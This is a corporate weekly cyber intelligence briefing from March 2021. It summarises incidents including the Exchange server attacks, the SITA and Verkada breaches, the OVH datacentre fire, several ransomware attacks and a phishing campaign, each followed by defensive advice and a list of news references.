header image

Cyber Intelligence Briefing: 12 March 2021

Billy Gouveia, Mona Damian 12 March 2021
12 March 2021    Billy Gouveia, Mona Damian

CHALLENGING INSECURITY: A ROADMAP TO CYBER CONFIDENCE

In our latest report, we demystify the drivers of insecurity among cyber security professionals, in so doing, mapping a path to cyber confidence.

Download Report

The S-RM Cyber Intelligence Briefing is a weekly round-up of the latest cyber security news, trends and indicators, curated by our intelligence specialists.

Microsoft Exchange servers under attack 

  • Besides the Chinese actor HAFNIUM, at least 10 APTs are reportedly hunting for unpatched Exchange servers.[1] The list of victims continues to grow, while 46,000 servers are still vulnerable.[2]
  • What to do now:  1) Patch and continue to track Microsoft’s continuing Exchange server security updates;[3] 2) Scan: Microsoft has updated its MSERT tool to find web shells from Exchange server attacks;[4] 3) Investigate: If you find signs the vulnerabilities were exploitedconduct a forensic investigation. 

So whatTime critical patching and scanning for indicators of compromise has never been more important. Read S-RM’s additional advice on Exchange ProxyLogon vulnerabilities   

Airline’s supply chain breach takes off  

  • SITA, an IT provider for around 400 companies in the airline industry, suffered a coordinated supply chain attack. The adversaries compromised frequent flyer data belonging to over 580,000 passengers. However, no passwords, email addresses, or credit card information was compromised.[5]  
  • Singapore Airlines was also impacted, despite not being a SITA customer. The airline shared a restricted set of data to facilitate membership tier status verification. 

So whatOrganisations should leverage vendor risk management programs to confirm suppliers have  essential security controls in place.   

Smile! You’re on camera 

  • A hacker group used leaked admin credentials to access over 150,000 live surveillance feeds owned by security camera company Verkada.[6] The hackers found a username and password for a Super Admin account publicly exposed on the internet, allowing them root access to the cameras. 
  • The group have access to complete video archives of Verkada’s customers, as well as live feeds. Locations using these affected cameras include prisons, hospitals, schools, and a Tesla supplier’s production site.[7] 

So whatOrganisations should thoroughly review the security of IoT devices and the implications if such devices are breached. 

OVH datacentres go up in flames 

  • OVH, a cloud computing company, suffered a fire at its Strasbourg facility on Wednesday, destroying one datacentre and damaging another.[8] Although not damaged in the fire, two further datacentres were also taken offline. 
  • Numerous organisations have been affected, with the incident rendering many OVH customers’ web services inaccessible.[9] Some customers have even experienced a complete loss of data, with no prospect of recovery.   

So whatEven the most advanced cyber security can’t protect organisations from physical incidents like this. The event underscores the importance of regular backups that are tested and stored securely.    

Ransomware round-up 

  • REvil ransomware group announce plan to leverage DOS attacks and VOIP calls to victim’s business partners and journalists. The group plans to use both tactics to exert additional pressure on its victims to pay a ransom.[10]  
  • Ryuk ransomware hits Spanish government agency for labour, affecting 700 offices nationwide.[11] The Spanish government has extended benefits applications while systems are out of service. We reported on Ryuk last week. 
  • Third French hospital in four weeks suffers ransomware attack.[12] The hospital’s system to monitor medicine supplies is impacted and comes at a crucial time in France’s COVID-19 vaccination rollout 

So whatUpdate your ransomware plans and playbooks to now include DOS attacks and phone calls to your affiliates. Ransomware remains a top threat transcending across sectors.   

Phishing campaign leverages Google reCAPTCHA  

  • A new phishing campaign aims to steal Microsoft Office 365 credentials.[13] A fake Google reCAPTCHA and personalised Microsoft login page are leveraged to trick victims into disclosing their corporate credentials.  
  • Over 2,500 phishing emails have been detected in this campaignpredominantly targeting senior business leaders in the banking and IT sector. 

So whatPhishing campaigns will continue to leverage ‘legitimate’ systems to deceive victimsTrain your employees on how to identify personalised phishing attempts.   

Patch Tuesday!  

  • Microsoft released patches for 89 vulnerabilities, 14 of which are marked as ‘critical’.[14] Five of these (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065 and CVE-2021-26411) are being actively exploited in the wild.  
  • Two Windows 10 updates – KB5000802 and KB50000808 – are reportedly causing systems to crash when attempting to print.[15] If affected, uninstall these two updates to alleviate the issue. 

So whatInstall the patches as soon as possible and look out for printing-related issues.  

Cyber Threat Intelligence Briefing

References:

[1] Exchange servers under siege from at least 10 APT groups, We Live Security by ESET, 10 March 2021. 

[2] More than 46,000 Exchange servers still unpatched, Recorded Future, 9 March 2021. 

[3] Released: March 2021 Exchange Server security Updates, Exchange Team Blog.

[4] MSERT tool now find web shells from Exchange Server attacks, BleepingComputer, 7 March 2021.

[5] SITA Supply Chain Breach Hits Multiple AirlinesZDNet5 March 2021.

[6] Hackers Breach Thousands of Security Cameras, Exposing Tesla, Jails, Hospitals, Bloomberg, 9 March 2021. 

[7] Tesla says Shanghai factory not hacked after breach of Verkada surveillance cameras, Reuters, 9 March 2021.

[8] Fire at Our Strasbourg Site, OVHcloud, 10 March 2021.  

[9] OVH data center burns down knocking major sites offline, Bleeping Computer, 10 March 2021. 

[10] Ransomware gang plans to call victim's business partners about attacks, BleepingComputer, 6 March 2021. 

[11] Ryuk ransomware hits 700 Spanish government labor agency offices, BleepingComputer, 10 March 2021. 

[12] Third French Hospital hit by cyberattack, Security Week, 9 March 2021.

[13] Fake Google reCAPTCHA Phishing Attack Swipes Office 365 Passwords, Threat Post, 8 March 2021. 

[14] Microsoft Patch Tuesday Updates Fix 14 Critical Bugs, Threat Post, 9 March 2021.

[15] Windows 10 crashes when printing due to Microsoft March updates, BleepingComputer, 10 March 2021.

To discuss this article or other industry developments, please reach out to one of our experts.

Billy Gouveia
Billy gouveia Senior Managing Director Email Billy
Mona Damian
Mona damian Senior Analyst Email Mona

CYBER INCIDENT RESPONSE: PERSPECTIVES FROM INSIDE THE RISK ECOSYSTEM

In our latest report, we examine a cyber incident from the perspective of several key stakeholders.

Download Report